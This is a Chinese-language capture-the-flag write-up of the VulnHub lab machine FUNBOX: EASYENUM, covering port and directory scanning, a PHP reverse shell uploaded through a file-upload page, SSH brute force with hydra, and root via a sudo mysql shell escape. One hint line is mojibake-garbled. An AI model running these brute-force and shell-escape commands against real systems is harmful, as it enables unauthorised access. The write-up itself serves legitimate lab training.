VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM

Posted 2021-09-13 H3rmesk1t

VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM

• 题目描述
• 环境下载
• FUNBOX: EASYENUM靶机搭建
• 渗透测试
• • 信息搜集
  • 漏洞挖掘
  • getshell
  • 提权

题目描述

Boot2root in 6 steps for script-kiddies.

Timeframe to root this box: 20 mins to never ever. It's on you.

HINTS:
Enum without sense, costs you too many time:
  1.Use "Daisys best friend" for information gathering.
  2.Visit "Karla at home".
  3.John and Hydra loves only rockyou.txt
  4.Enum/reduce the users to brute force with or brute force the rest of your life.

This works better with VirtualBox rather than VMware

环境下载

• 戳此进行环境下载

FUNBOX: EASYENUM靶机搭建

• 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡

1. 将下载好的靶机环境，导入 VritualBox，设置为 Host-Only 模式
2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

• 目标靶机的 IP 地址为：192.168.56.115
• 攻击机的 IP 地址为：192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息：sudo nmap -sS -A -Pn 192.168.56.115，发现开放了 22、80、110、143 四个端口

用 dirb 扫描一下 80 端口 web 目录：dirb http://192.168.56.115

漏洞挖掘

• 根据扫描的结果访问 http://192.168.56.115/robots.txt 和 http://192.168.56.115/secret/，得到以下信息

Allow: Enum_this_Box

æ ¹å¯†ç æ˜¯ç”¨æˆ·å¯†ç çš„ç»„åˆï¼šharrysallygoatoraclelissy 

• 暂时没发现什么可以利用的地方，用 gobuster 再次扫描一下目录，发现一个文件很可疑 mini.php

gobuster dir -u http://192.168.56.115 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt

getshell

• 根据扫描结果，访问 http://192.168.56.115/mini.php，发现存在文件上传漏洞，上传一个 PHP-Shell 反弹马，起 nc 成功接收到反弹的 shell

提权

• 查看用户时发现存在的用户名拼接起来就是 http://192.168.56.115/secret/ 中的内容

• 利用 hydra 爆破密码，得到一组可以利用的用户名和密码：goat:thebest

hydra -l username -P rockyou.txt -V 192.168.56.115 ssh

• 切换用户到 goat，查看 sudo -l，发现可以利用 mysql 来进行提权，成功拿到 root 权限

sudo /usr/bin/mysql -e '\\! /bin/sh'